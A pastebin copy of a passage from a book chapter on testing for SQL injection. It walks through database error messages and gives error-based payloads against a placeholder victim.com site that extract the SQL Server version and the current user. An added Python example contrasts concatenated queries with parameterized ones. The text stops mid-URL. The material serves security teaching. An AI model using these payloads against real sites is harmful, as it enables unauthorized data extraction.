sql


SUBMITTED BY: leakage

DATE: Dec. 7, 2015, 4:40 p.m.

FORMAT: Text only

SIZE: 4.4 kB

HITS: 147784

Chapter 2 • Testing for SQL Injection

current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation
mark before the character string 'attaker;'.

Obviously, you don't have to memorize every error code. The important thing is that you understand when and why an error occurs. In both examples, you can assert that the remote SQL statement running on the database must be something similar to the following:

SELECT *
FROM products
WHERE category='attacker''

The application did not sanitize the single quotes, and therefore the syntax of the statement is rejected by the database server, which returns an error.

You just saw an example of injection in an alphanumeric string. The following example will show the typical error returned when injecting a numeric value, which is therefore not enclosed in quotes in the SQL statement.

Imagine you find a page called showproduct.aspx in the victim.com application. The script receives a parameter called id and displays a single product depending on the value of the id parameter:

http://www.victim.com/showproduct.aspx?id=2

When you change the value of the id parameter to something such as the following:

http://www.victim.com/showproduct.aspx?id=attacker

the application returns an error similar to this:

Server Error in '/' Application.
Invalid column name 'attacker'.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Invalid column name
'attacker'.

Based on the error, you can assume that in the first instance the application creates an SQL statement such as this:

SELECT *
FROM products
WHERE idproduct=2

The preceding statement returns a result set with the product whose idproduct field equals 2. However, when you inject a non-numeric value, such as attacker, the resultant SQL statement sent to the database server has the following syntax:

SELECT *
FROM products
WHERE idproduct=attacker

The SQL server understands that if the value is not a number it must be a column name. In this case, the server looks for a column called attacker within the products table. However, there is no column named attacker, and therefore it returns an error.
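The two statements reconstructed above (the quoted category filter and the unquoted idproduct filter) can be reproduced side by side with their parameterized equivalents. The following is an added example, not code from the book or from the showproduct.aspx application it describes: it runs against an in-memory SQLite database standing in for SQL Server, with a small constructed products table. SQLite's error texts differ from SQL Server's ("unrecognized token" and "no such column" instead of "Unclosed quotation mark" and "Invalid column name"), but the failure modes are the same, and the handle_request wrapper shows the server-side fix for the page's other problem: returning the raw exception text to the client.

```python
"""Added example: string-built queries beside parameterized ones in SQLite.
SQLite is an assumption standing in for SQL Server; the table is constructed."""
import logging
import sqlite3

log = logging.getLogger("showproduct")


def make_db():
    """Constructed sample data: a products table with an integer id, a name, a category."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (idproduct INTEGER, name TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "road bike", "bikes"), (2, "helmet", "accessories"), (3, "mtb", "bikes")],
    )
    return conn


def vulnerable_by_category(conn, category):
    # Unsanitized concatenation of a quoted string: category=attacker' yields
    # WHERE category='attacker'' and the parser rejects the statement.
    sql = f"SELECT * FROM products WHERE category='{category}'"
    return conn.execute(sql).fetchall()


def vulnerable_by_id(conn, product_id):
    # Numeric parameter spliced in without quotes: id=attacker yields
    # WHERE idproduct=attacker, which the engine reads as a column name.
    sql = f"SELECT * FROM products WHERE idproduct={product_id}"
    return conn.execute(sql).fetchall()


def safe_by_category(conn, category):
    # Bound parameter: the quote is data, never part of the statement text.
    return conn.execute("SELECT * FROM products WHERE category=?", (category,)).fetchall()


def safe_by_id(conn, product_id):
    # Bound parameter: a non-numeric value simply matches no row.
    return conn.execute("SELECT * FROM products WHERE idproduct=?", (product_id,)).fetchall()


def probe(func, conn, value):
    """Run one query builder and report ('ok', rows) or ('error', message)."""
    try:
        return ("ok", func(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def handle_request(conn, query_func, value):
    """Server-side handling: details go to the log, the client gets a generic message."""
    try:
        return {"status": 200, "rows": query_func(conn, value)}
    except sqlite3.Error as exc:
        log.error("database error for value=%r: %s", value, exc)
        return {"status": 500, "body": "An error occurred processing your request."}


if __name__ == "__main__":
    db = make_db()
    for builder, value in [
        (vulnerable_by_category, "attacker'"),
        (safe_by_category, "attacker'"),
        (vulnerable_by_id, "attacker"),
        (safe_by_id, "attacker"),
    ]:
        print(builder.__name__, value, "->", probe(builder, db, value))
    print(handle_request(db, vulnerable_by_id, "attacker"))
```

Running it shows the pattern the chapter reads out of the error pages: the concatenated builders fail on a stray quote or an unquoted word, while the bound-parameter builders return an empty result set for the same input. The handle_request wrapper is independent of parameterization and addresses the information leak on its own; even a query that still fails never sends the database's message to the browser.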
There are some techniques that you can use to retrieve information embedded in the errors returned from the database. The first one generates an error converting a string to an integer:

http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/@@version;--

Application response:

Server Error in '/' Application.
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 –
8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft
Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: ) ' to a
column of data type int.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.

The database reported an error, converting the result of @@version to an integer and displaying its contents. This technique abuses the type conversion functionality in SQL Server. We sent 0/@@version as part of our injected code. As a division operation needs to be executed between two numbers, the database tries to convert the result from the @@version function into a number. When the operation fails, the database displays the content of the variable.

You can use this technique to display any variable in the database. The following example uses this technique to display the user variable:

http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/user;--

Application response:

Syntax error converting the nvarchar value 'dbo' to a column of data type
int.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.

There are also techniques to display information about the statement executed by the database, such as the use of having 1=1:

http://www.victim.com/showproducts.aspx?cat
